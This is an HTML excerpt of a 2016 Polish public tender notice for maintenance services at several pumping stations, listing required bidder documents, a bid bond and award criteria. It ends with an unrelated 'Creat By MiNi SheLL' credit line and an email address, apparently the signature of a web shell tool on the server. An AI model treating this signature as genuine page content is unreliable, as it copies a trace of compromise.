                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia dokument ten, musi złożyć każdy z Wykonawców  oddzielnie. Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika. W przypadku spółek jawnych do oferty należy złączyć zaświadczenie na spółkę
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. sporządzony przez Wykonawcę wykaz usług, o których mowa w rozdz. X pkt 2.1.1 SIWZ we wzorze stanowiącym załącznik nr 2 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w rozdz. X pkt 2.1.1 SIWZ. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał.

2. dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.


3 wykaz osób skierowanych przez wykonawcę do realizacji zamówienia, spełniających wymagania określone w rozdz. X pkt. 2.1.2-2.1.4 SIWZ we wzorze stanowiącym załącznik nr 3 do SIWZ. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu  oryginał 

4 oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy  według wzoru stanowiącego załącznik nr 4 do SIWZ. Wymagana forma dokumentu  oryginał. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.zobowiązanie, o którym mowa w rozdz. VIII pkt 2 SIWZ  - w przypadku kiedy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów w trybie art. 22a ustawy.

2 pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost   z dokumentu stwierdzającego status prawny Wykonawcy  nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

3 pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o których mowa w rozdz. XII SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert, z uwzględnieniem trzydziestodniowego terminu związania ofertą. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,  gwarancjach bankowych lub ubezpieczeniowych, poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2007 Nr 42, poz.275 z późn. zm).

Wysokość wadium ustala się w kwocie 4 000,00 zł (słownie: cztery tysiące zł 00/100)
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Częstotliwość koszenia     </td><td>26</td></tr><tr><td>doświadczenie personelu  pompownia Grabina</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Zajeziorze</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Szewce</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Sandomierz Nadbrzezi</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Kępa Chwałowska</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Linów</td><td>2</td></tr><tr><td>doświadczenie personelu  pompownia Nowe</td><td>2</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy na warunkach §9 wzoru umowy stanowiącej załącznik nr 8 do SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com